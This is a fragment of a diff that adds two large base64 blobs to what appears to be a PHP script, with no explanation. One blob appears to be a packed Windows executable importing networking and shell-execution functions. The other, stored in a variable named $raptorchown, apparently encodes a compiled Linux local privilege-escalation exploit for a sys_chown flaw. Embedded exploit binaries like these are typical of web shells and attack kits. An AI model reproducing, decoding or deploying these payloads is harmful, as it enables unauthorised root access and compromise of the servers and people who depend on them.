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
+AAEAAAA+AQCA8AAAgAAAAAA9qgMxAAAAAAAAAQAYBAAACAEAAEDEAQAUAAAAAAAAAAAAAAAGAEQA
+VgBDAEwAQQBMAAsAUABBAEMASwBBAEcARQBJAE4ARgBPAAgATQBBAEkATgBJAEMATwBOAFCRAQAo
+AAAAIAAAAEAAAAABAAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAA
+AACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAd3d3d3d3d3d3d3d3d3d3cHiIiIiIiIiIiIiIiIiIiHB4f///
+//////////////hweH/////////////////4cHh/////////////////+HB4f///////////////
+//hweH/////////////////4cHh/////////////////+HB4f/////////////////hweH//////
+///////////4cHh/////////////////+HB4f/////////////////hweH/////////////////4
+cHh/////////////////+HB4f/////////////////hweH/////////////////4cHh/////////
+////////+HB4f/////////////////hweH/////////////////4cHh/////////////////+HB4
+d3d3d3d3d3d3d3d3d3hweIiIiIiIiIiIiIiIiIiIcHhERERERERERERAAAAAAHB4RERERERERERE
+SICICIBweEREREREREREREiAiAiAcHhERERERERERERERERERHB4iIiIiIiIiIiIiIiIiIhwd3d3
+d3d3d3d3d3d3d3d3cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////
+///MlAEAAAABAAEAICAEAAEABADoAgAAAQAAAAAAAAAAAAAAAABQxQEACMUBAAAAAAAAAAAAAAAA
+AF3FAQAYxQEAAAAAAAAAAAAAAAAAasUBACDFAQAAAAAAAAAAAAAAAAB0xQEAKMUBAAAAAAAAAAAA
+AAAAAIHFAQAwxQEAAAAAAAAAAAAAAAAAjcUBADjFAQAAAAAAAAAAAAAAAACYxQEAQMUBAAAAAAAA
+AAAAAAAAAKTFAQBIxQEAAAAAAAAAAAAAAAAAAAAAAAAAAACwxQEAvsUBAM7FAQAAAAAA3MUBAAAA
+AADqxQEAAAAAAPTFAQAAAAAABMYBAAAAAAAUxgEAAAAAAB7GAQAAAAAALsYBAAAAAABLRVJORUwz
+Mi5ETEwAYWR2YXBpMzIuZGxsAGdkaTMyLmRsbABvbGVhdXQzMi5kbGwAc2hlbGwzMi5kbGwAdXNl
+cjMyLmRsbAB3aW5pbmV0LmRsbAB3c29jazMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0Fk
+ZHJlc3MAAEV4aXRQcm9jZXNzAAAAUmVnRW51bUtleUEAAABUZXh0T3V0QQAAU3lzRnJlZVN0cmlu
+ZwAAAFNoZWxsRXhlY3V0ZUEAAABTZXRGb2N1cwAASW50ZXJuZXRPcGVuQQAAAHNlbmQAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJFRU
+Wdfb08/q3OiZ0eXTbpynnqlyfKdzc3NiXaFemV+lYJ1tYVdh1OXK1tbYm9vo02Hp8MnR0+SWzNnY
+ZVtSoFJcTlRPp5avqVzj4NrWosfQ1VBaUFrzrZi+wZ2ooauorLiWqJK8rLazkrimo5mVmJq3rquX
+tKahmaip8li6s8aGztfv2s7TzFysw7iMwNPh3NrL2FQ=";
+
+$raptorchown="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
+Q29weXJpZ2h0IChjKSAyMDA0IE1hcmNvIEl2YWxkaSA8cmFwdG9yQDB4ZGVhZGJlZWYuaW5mbz4A
+AAAAAAAAAHJhcHRvcl9jaG93bi5jIC0gc3lzX2Nob3duIG1pc3NpbmcgREFDIGNvbnRyb2xzIG9u
+IExpbnV4ACVzCiVzCgoAdXNhZ2U6ICVzIGZpbGVfbmFtZQoKAEVycm9yOiBOb3QgdnVsbmVyYWJs
+ZSEKAEVycm9yAE5pbnBvdTogc3lzX2Nob3duIG5vIGp1dHN1IQoAL2Jpbi9scyAtbCAlcwAAAAAA
+AAAAAOSYBAgAAAAAAQAAAAEAAAAMAAAAnIMECA0AAADIhgQIBAAAAEiBBAgFAAAAYIIECAYAAACQ
+gQQICgAAAJcAAAALAAAAEAAAABUAAAAAAAAAAwAAAOyYBAgCAAAASAAAABQAAAARAAAAFwAAAFSD
+BAgRAAAARIMECBIAAAAQAAAAEwAAAAgAAAD+//9vFIMECP///28BAAAA8P//b/iCBAgAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA
+AAAAABCYBAgAAAAAAAAAAMqDBAjagwQI6oMECPqDBAgKhAQIGoQECCqEBAg6hAQISoQECAAAAAAA
+R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH
+Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD
+QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAALnN5
+bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5bnN5
+bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAu
+aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA
+LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAAj
+AAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEECEgB
+AABIAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAJCBBAiQAQAA0AAAAAUAAAABAAAABAAA
+ABAAAAA/AAAAAwAAAAIAAABgggQIYAIAAJcAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28CAAAA
++IIECPgCAAAaAAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAABSDBAgUAwAAMAAAAAUAAAAB
+AAAABAAAAAAAAABjAAAACQAAAAIAAABEgwQIRAMAABAAAAAEAAAAAAAAAAQAAAAIAAAAbAAAAAkA
+AAACAAAAVIMECFQDAABIAAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAJyDBAicAwAAFwAA
+AAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAC0gwQItAMAAKAAAAAAAAAAAAAAAAQAAAAEAAAA
+ewAAAAEAAAAGAAAAVIQECFQEAAB0AgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiGBAjI
+BgAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAAAAhwQIAAcAAAABAAAAAAAAAAAAACAA
